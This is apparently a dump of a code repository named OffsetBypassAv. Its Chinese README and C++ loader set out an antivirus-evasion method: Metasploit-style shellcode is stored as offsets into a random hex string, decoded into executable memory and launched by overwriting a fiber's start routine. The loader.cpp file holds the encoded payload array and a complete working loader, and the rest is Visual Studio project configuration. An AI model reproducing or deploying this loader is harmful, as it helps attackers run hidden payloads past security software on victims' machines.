├── BypassAv2 ├── OffsetClac │ ├── offestcalc.cpp │ ├── OffsetClac.vcxproj.user │ ├── OffsetClac.vcxproj.filters │ └── OffsetClac.vcxproj ├── Loader │ ├── Loader.vcxproj.user │ ├── Loader.vcxproj.filters │ ├── loader.cpp │ └── Loader.vcxproj └── BypassAv2.sln └── README.md /BypassAv2/OffsetClac/offestcalc.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rixoye/OffsetBypassAv/HEAD/BypassAv2/OffsetClac/offestcalc.cpp -------------------------------------------------------------------------------- /BypassAv2/Loader/Loader.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /BypassAv2/OffsetClac/OffsetClac.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # OffsetBypassAv 2 | 3 | 4 | ### 免杀思路 5 | 随机找一个包含`0-f`的字符串,将shellcode用该字符串的偏移量进行解析,输出偏移量数组。 6 | 7 | 实际加载时再从该随机字符串中提取对应的字符拼接,形成shellcode后再执行。 8 | 9 | ### 部分代码讲述 10 | OffsetClac文件夹下是计算偏移的代码,shellcode和随机字符串自个替换就可以使用了,计算偏移过程中,只要注意一下,16进制和ASCII码字符的转换就好了。 11 | 12 | Loader文件夹下是一个shellcode加载器,在shellcode的加载器中,我使用了Windows系统回调函数触发shellcode的方式,代码中仅写了x64下的,x86下的要自个重新计算CreateFiber函数的回调函数偏移量。 13 | 14 | ### 实际免杀效果 15 | 由于没有去做反沙箱的手段,所以沙箱运行的内存识别还是发现了msf的shellcode特征。 16 | url:https://www.virscan.org/report/afaaee5837f656499f91cd37fca8fa78a597df1ff66bcc716282c982fb6d268d 17 | image 18 | 19 | 20 | ### 代码 21 | https://github.com/rixoye/OffsetBypassAv 22 | -------------------------------------------------------------------------------- /BypassAv2/Loader/Loader.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 源文件 20 | 21 | 22 | -------------------------------------------------------------------------------- /BypassAv2/OffsetClac/OffsetClac.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 源文件 20 | 21 | 22 | -------------------------------------------------------------------------------- /BypassAv2/BypassAv2.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.32126.315 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "OffsetClac", "OffsetClac\OffsetClac.vcxproj", "{479EC10B-37D7-4335-AF11-9C469DC98198}" 7 | EndProject 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Loader", "Loader\Loader.vcxproj", "{CD80CA90-7FDE-4BDA-8E51-C0948E793844}" 9 | EndProject 10 | Global 11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 12 | Debug|x64 = Debug|x64 13 | Debug|x86 = Debug|x86 14 | Release|x64 = Release|x64 15 | Release|x86 = Release|x86 16 | EndGlobalSection 17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 18 | {479EC10B-37D7-4335-AF11-9C469DC98198}.Debug|x64.ActiveCfg = Debug|x64 19 | {479EC10B-37D7-4335-AF11-9C469DC98198}.Debug|x64.Build.0 = Debug|x64 20 | {479EC10B-37D7-4335-AF11-9C469DC98198}.Debug|x86.ActiveCfg = Debug|Win32 21 | {479EC10B-37D7-4335-AF11-9C469DC98198}.Debug|x86.Build.0 = Debug|Win32 22 | {479EC10B-37D7-4335-AF11-9C469DC98198}.Release|x64.ActiveCfg = Release|x64 23 | {479EC10B-37D7-4335-AF11-9C469DC98198}.Release|x64.Build.0 = Release|x64 24 | {479EC10B-37D7-4335-AF11-9C469DC98198}.Release|x86.ActiveCfg = Release|Win32 25 | {479EC10B-37D7-4335-AF11-9C469DC98198}.Release|x86.Build.0 = Release|Win32 26 | {CD80CA90-7FDE-4BDA-8E51-C0948E793844}.Debug|x64.ActiveCfg = Debug|x64 27 | {CD80CA90-7FDE-4BDA-8E51-C0948E793844}.Debug|x64.Build.0 = Debug|x64 28 | {CD80CA90-7FDE-4BDA-8E51-C0948E793844}.Debug|x86.ActiveCfg = Debug|Win32 29 | {CD80CA90-7FDE-4BDA-8E51-C0948E793844}.Debug|x86.Build.0 = Debug|Win32 30 | {CD80CA90-7FDE-4BDA-8E51-C0948E793844}.Release|x64.ActiveCfg = Release|x64 31 | {CD80CA90-7FDE-4BDA-8E51-C0948E793844}.Release|x64.Build.0 = Release|x64 32 | {CD80CA90-7FDE-4BDA-8E51-C0948E793844}.Release|x86.ActiveCfg = Release|Win32 33 | {CD80CA90-7FDE-4BDA-8E51-C0948E793844}.Release|x86.Build.0 = Release|Win32 34 | EndGlobalSection 35 | GlobalSection(SolutionProperties) = preSolution 36 | HideSolutionNode = FALSE 37 | EndGlobalSection 38 | GlobalSection(ExtensibilityGlobals) = postSolution 39 | SolutionGuid = {BBD688C1-579B-4707-A530-7EAB3221D5E7} 40 | EndGlobalSection 41 | EndGlobal 42 | -------------------------------------------------------------------------------- /BypassAv2/Loader/loader.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | //#define DEBUG 4 | #ifdef DEBUG 5 | #define TRACE() debugPrint(__FILE__,__LINE__) 6 | #else 7 | #define TRACE() 8 | #endif 9 | void debugPrint(CONST CHAR* path, INT line) { 10 | #ifdef DEBUG 11 | printf("file:%s line:%d error:%d\n", path, line, GetLastError()); 12 | #endif // DEBUG 13 | } 14 | 15 | 16 | unsigned int buf[] = { 17 | 9,10,11, 0, 0, 4,13,11, 9,15,13, 0,10,15,15,15, 18 | 15,15,15,15,11, 3, 6, 3,11, 3, 6,15, 6, 5, 6, 3, 19 | 6, 7,11, 0, 4, 3,14, 5, 7, 6,11, 0, 0, 8, 6, 5, 20 | 7,15,11, 0, 0, 8, 6, 5, 3, 0,11, 0, 0, 8, 6, 5, 21 | 5,15,11, 0, 0, 8, 1, 5, 6,15,11, 0,15, 9, 8, 1, 22 | 11, 2,11, 2,11,14, 4, 3,10,12,11, 0, 4, 3,10,15, 23 | 2,10, 4,10, 7, 3, 1,10,15, 5, 5,10, 5,15,11, 3, 24 | 10, 3,10,12,15,14,11, 3,15, 3,10, 3,13, 5,13,14, 25 | 6, 5,11, 3, 6, 3,11, 0, 0, 8, 6, 5, 5,15, 0, 8, 26 | 11, 5, 4,10,11, 0,15, 3,14,15, 0, 8, 0,15, 0, 0, 27 | 15,15,15,15,15,15,11, 0, 0, 6,10,15, 1,11, 7, 1, 28 | 11, 0,15, 3,14,15, 6,15, 0, 8,11, 0, 3, 0,11,11, 29 | 0, 8,11,15, 5,15,11,12,15, 3,14,15,13, 4, 6, 7, 30 | 11, 0, 9, 9,10,12,11, 3, 0, 8, 4,11, 0, 0,11, 0, 31 | 15, 3,14, 7,11,14, 4, 3,10,12,11, 0, 4, 3,10,15, 32 | 2,10,11, 3,10, 3,10,12,15,14,11, 3,15, 3,10, 3, 33 | 4, 0,13,15, 1, 6, 9, 3,11,10,15, 4,11,10, 5,11, 34 | 15, 0,11, 6, 4,12,14, 3, 1, 6,14, 0, 6, 0,11,11, 35 | 0, 8,11,15, 5,11,11,12,15, 3,14,15, 7, 7,11, 3, 36 | 0, 8,15,10,11, 0,11,11, 0, 8,11,15, 3,10,11,12, 37 | 15, 3,14,15,11, 3, 0, 8,15,11, 0, 0,11, 0,15, 3, 38 | 14,15,11, 3, 6, 0,11, 3, 6, 0, 6,13, 6,12, 6, 2, 39 | 11, 3, 6, 0,11, 3, 6,12,11, 3, 6, 2,11, 0, 0, 4, 40 | 13,10, 5,15,11, 3, 6, 5, 9, 9,13,15, 6, 0,11, 3, 41 | 6,12, 6, 2,11, 0, 0, 8, 3, 5,13,12, 6, 1, 9, 9, 42 | 9, 9, 9, 9, 6,14,11, 0, 8, 2,15, 3,15,15,15,15, 43 | 15,15,15,15,15,15,15,15,15,15,11, 0, 0,14, 0,14, 44 | 15, 3,15, 3,15,15,15,15,11, 3, 8, 2, 4, 3, 0, 8, 45 | 7, 9, 0, 1, 9, 9,14, 6, 8, 8, 9,15, 8, 6, 2, 5, 46 | 6, 7,11, 3, 8, 2, 2, 7,12, 6, 8,14,12,14, 9, 9, 47 | 14, 6,11, 0, 0, 4,10,11, 5, 0, 4,10,15, 7, 1,10, 48 | 15, 2, 0,15, 9, 8,13,15, 1, 6,15, 6, 8, 8,11, 1, 49 | 3, 4, 1, 5, 7, 9, 7, 2,15,15, 6,12,11, 3, 0,12, 50 | 14, 2, 9, 9,14, 6, 7, 4, 7, 3, 7,10, 7, 4, 5,13, 51 | 7, 6, 1, 0, 7, 6,15,15,15,15 }; 52 | 53 | char table[] = "87a13256bfc49ed0"; 54 | 55 | char itoh(int i) { 56 | char c = table[i]; 57 | 58 | if (c < 0x60) { 59 | c = c - 0x30; 60 | } 61 | else { 62 | c = c + 0x0a - 0x61; 63 | } 64 | return c; 65 | } 66 | 67 | 68 | void code(void *buf,unsigned int* off, int offlen) { 69 | int len = offlen / 2; 70 | char tmp = 0x00; 71 | for (int i = 0, j = 0; i < len && j < offlen; i++, j = 2 * i) { 72 | tmp = ((itoh(off[j]) << 4) & 0xf0) | (itoh(off[j + 1]) & 0x0f); 73 | ((char*)buf)[i] = tmp; 74 | } 75 | } 76 | 77 | 78 | int main() { 79 | 80 | ConvertThreadToFiber(NULL); 81 | 82 | LPVOID lpFiber = CreateFiber(0x100, (LPFIBER_START_ROUTINE)debugPrint, NULL); 83 | LPVOID addr = VirtualAlloc(NULL, sizeof(buf)/4, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 84 | code(addr,buf, sizeof(buf)/4); 85 | 86 | if (lpFiber == NULL) { 87 | TRACE(); 88 | exit(0); 89 | } 90 | 91 | uintptr_t* tgtFuncAddr = (uintptr_t*)((uintptr_t)lpFiber + 0xB0); 92 | *tgtFuncAddr = (uintptr_t)addr; 93 | 94 | SwitchToFiber(lpFiber); 95 | } -------------------------------------------------------------------------------- /BypassAv2/OffsetClac/OffsetClac.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {479ec10b-37d7-4335-af11-9c469dc98198} 25 | OffsetClac 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v142 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v142 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Level3 88 | true 89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 90 | true 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | Level3 100 | true 101 | true 102 | true 103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | true 105 | 106 | 107 | Console 108 | true 109 | true 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | false 117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 118 | false 119 | Default 120 | 121 | 122 | Console 123 | true 124 | 125 | 126 | 127 | 128 | Level3 129 | true 130 | true 131 | false 132 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 133 | false 134 | Default 135 | 136 | 137 | Console 138 | true 139 | true 140 | true 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | -------------------------------------------------------------------------------- /BypassAv2/Loader/Loader.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {cd80ca90-7fde-4bda-8e51-c0948e793844} 25 | Loader 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v142 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v142 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | 79 | 80 | true 81 | false 82 | 83 | 84 | false 85 | false 86 | 87 | 88 | 89 | Level3 90 | true 91 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | 94 | 95 | Console 96 | true 97 | 98 | 99 | 100 | 101 | Level3 102 | true 103 | true 104 | true 105 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 106 | true 107 | 108 | 109 | Console 110 | true 111 | true 112 | true 113 | 114 | 115 | 116 | 117 | Level3 118 | false 119 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 120 | true 121 | true 122 | MultiThreaded 123 | MinSpace 124 | Default 125 | 126 | 127 | Console 128 | false 129 | false 130 | 131 | 132 | 133 | 134 | Level3 135 | false 136 | false 137 | false 138 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 139 | false 140 | true 141 | MultiThreaded 142 | MinSpace 143 | Default 144 | false 145 | None 146 | Fast 147 | false 148 | false 149 | false 150 | false 151 | 152 | 153 | Console 154 | true 155 | true 156 | false 157 | false 158 | false 159 | true 160 | false 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | --------------------------------------------------------------------------------